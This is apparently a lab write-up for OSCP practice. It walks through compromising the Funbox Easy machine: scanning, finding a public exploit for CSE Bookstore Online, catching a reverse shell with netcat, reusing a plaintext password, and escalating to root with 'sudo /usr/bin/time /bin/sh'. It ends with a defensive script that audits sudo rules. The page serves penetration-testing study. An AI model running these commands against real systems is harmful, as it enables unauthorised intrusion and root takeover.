Preparing for OSCP | Sharing Practical Labs & Real-World Attack Analysis

Funbox Easy: Web Exploit to GTFOBins Privilege Escalation

Today's machine demonstrated how vulnerable web applications combined with weak privilege configurations can lead to full system compromise.

🔎 Step 1: Initial Enumeration

Started with an aggressive Nmap scan:

nmap -sCV -A --min-rate 1000 192.168.xx.xx

Explanation:

  • -sC → Default scripts
  • -sV → Service version detection
  • -A → OS detection + aggressive scan
  • --min-rate 1000 → Faster scanning

Findings:

✔ Port 80 open
✔ Web server running

🌐 Step 2: Directory Brute Force

Performed directory enumeration:

feroxbuster --url http://192.168.xx.xx

The goal was to discover hidden directories and endpoints.

Result:

✔ Found /store directory
✔ Identified application: CSE Bookstore Online

💥 Step 3: Searching for Exploit

Searched exploit database:

searchsploit cse bookstore online

Found a working public exploit.

Downloaded exploit:

searchsploit -m <exploit_id>

Downloaded and ran the exploit.

๐Ÿš Step 4: Reverse Shell Execution

Started listener on attacker machine:

nc -lnvp 1234

Modified exploit to include reverse shell payload.

Executed exploit → Reverse shell received successfully.

Upgraded shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

🔐 Step 5: Post Exploitation

While enumerating system users:

Discovered user: tony

Found password file inside tony's directory:

cat password.txt

Used discovered password to switch user:

su tony

Successfully accessed tony account.

⚡ Step 6: Privilege Escalation (GTFOBins: time)

Enumerated sudo permissions:

sudo -l

Observed that the time binary could be executed with sudo.

Checked GTFOBins for time.

Used:

sudo /usr/bin/time /bin/sh

If a binary is allowed via sudo and supports command execution, it can spawn a shell with root privileges.
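
From the defender's side, the same rule can be caught by auditing `sudo -l` output before an attacker reads it. The script below is an added example, not part of the original walkthrough; the `COMMAND_RUNNERS` sample list, the `audit_sudo_l` function name and the sample output (including the hostname) are assumptions made for illustration.

```python
import re

# Binaries that execute whatever command is passed to them, so an open sudo
# rule for one is a root shell. Illustrative sample only, not the full
# GTFOBins catalogue; "time" is the entry this page used.
COMMAND_RUNNERS = {"time", "env", "nice", "timeout", "nohup", "xargs", "find"}

# Constructed `sudo -l` output (hostname and rules are made up for the example).
SAMPLE_SUDO_L = """\
Matching Defaults entries for tony on labhost:
    env_reset, mail_badpass

User tony may run the following commands on labhost:
    (root) NOPASSWD: /usr/bin/time
    (root) NOPASSWD: /usr/sbin/service apache2 restart
    (root) /usr/bin/env, /usr/bin/nice -n 5 /opt/backup.sh
    (www-data) /usr/bin/find
"""

# "    (runas[:group]) [TAG: ...] cmd[, cmd ...]"
RULE = re.compile(r"^\s+\((?P<runas>[^)]*)\)\s+(?:[A-Z_]+:\s*)*(?P<cmds>.+)$")

def audit_sudo_l(text):
    """Return (runas, command, reason) for rules that amount to a root shell."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()
        if runas not in ("root", "ALL"):
            continue  # only rules that run as root are in scope here
        # sudo escapes literal commas inside arguments as "\,"
        for cmd in re.split(r"(?<!\\),\s*", m.group("cmds").strip()):
            argv = cmd.split()
            name = argv[0].rsplit("/", 1)[-1]
            # A rule with no argument list accepts ANY arguments; a rule
            # with fixed arguments (or "") only matches those exactly.
            open_args = len(argv) == 1 or any("*" in a for a in argv[1:])
            if argv[0] == "ALL":
                findings.append((runas, cmd, "unrestricted sudo"))
            elif name in COMMAND_RUNNERS and open_args:
                findings.append((runas, cmd, "runs arbitrary commands as root"))
    return findings

if __name__ == "__main__":
    for runas, cmd, reason in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"[!] ({runas}) {cmd}: {reason}")
```

Only the open `time` and `env` rules are reported; the `nice` rule is pinned to fixed arguments, which sudo matches exactly, so it does not hand out an arbitrary command.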

👑 Result

✔ Web exploitation
✔ Reverse shell access
✔ Credential discovery
✔ User pivot to tony
✔ GTFOBins privilege escalation
✔ Root shell obtained